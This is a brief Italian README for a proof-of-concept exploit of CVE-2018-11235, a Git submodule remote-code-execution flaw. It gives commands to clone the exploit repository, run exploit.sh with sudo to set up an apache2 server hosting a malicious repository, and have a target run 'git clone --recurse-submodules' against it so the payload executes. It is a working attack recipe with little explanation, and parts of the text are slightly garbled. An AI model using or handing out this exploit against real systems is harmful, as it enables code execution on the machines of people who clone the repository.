
PoC di exploit per CVE-2018-11235
git clone https://github.com/Rezy-Dev/CVE-2018-11235
cd CVE-2018-11235
x) a exploit.sh ed eseguilo:sudo chmod +x exploit.sh
sudo ./exploit.sh
Scarica apache2 e costruisce per noi il repository malevolo.
http://vps-ip/malicious.git come repository git.git clone --recurse-submodules http://vps-ip/malicious.git
Il comando RCE del payload dovrebbe eseguirsi.
Grazie!